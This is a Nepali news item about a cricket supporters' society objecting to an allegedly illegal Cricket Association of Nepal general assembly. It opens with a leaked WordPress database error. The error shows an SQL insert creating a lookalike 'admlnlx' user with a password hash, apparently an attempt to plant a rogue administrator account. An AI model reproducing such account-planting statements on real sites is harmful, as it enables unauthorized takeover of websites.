WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BFErGbS7fKEPzMsVbANG.EFpw14gL//', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 06:51:06', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस ६–
राष्ट्रिय खेलकुद परिषद्बाट अवैधानिक ठहरिएको नेपाल क्रिकेट संघ (क्यान)ले काठमाडौंमा मंगलबार साधारणसभा गरेकोप्रति नेपाली क्रिकेट समर्थक समाजले गम्भिर ध्यानाकर्षण जनाएको छ ।
आज (बुधबार) सचिव बिमल पौडेलद्धारा जारी विज्ञप्तीमा आफैले मान्यता नदिएको क्यानको साधारणसभामा उपस्थित भएका आफ्ना कर्मचारीहरुलाई कारवाही गर्न राष्ट्रिय खेलकुद परिषद्संग माग गरेको छ । समाजले सम्मानित अदालतमा आफैले मुद्धा दायर गरेर निर्णय नआईसकेको अवस्थामा नेपाली क्रिकेटलाई निकास दिन आईसिसि, खेलकुद मन्त्रालय र राष्ट्रिय खेलकुद परिषदका प्रयासलाई चुनौती दिने उद्देश्यले अबैधानिक रुपमा गरिएको साधारणसभा प्रति आपत्ति जनाएको छ । साथै एकै वर्षमा दुई पटक साधारणसभा गरेर ताण्डव नृत्य देखाउनु खोज्नु नेपाली क्रिकेटको अवमुल्यन गर्न खोज्नु भएको समाजले ठहर गरेको छ ।